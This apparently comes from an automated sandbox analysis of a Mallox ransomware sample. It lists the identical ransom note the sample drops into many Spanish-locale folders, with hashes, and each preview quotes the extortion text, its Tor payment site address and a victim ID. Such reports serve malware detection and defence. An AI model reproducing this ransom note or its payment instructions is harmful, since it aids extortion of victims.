                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-419\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-AR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-BO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-CL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-CO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-CR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-DO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-EC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-ES\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-GT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-HN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-MX\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-NI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-PA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-PE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-PR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-PY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-SV\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
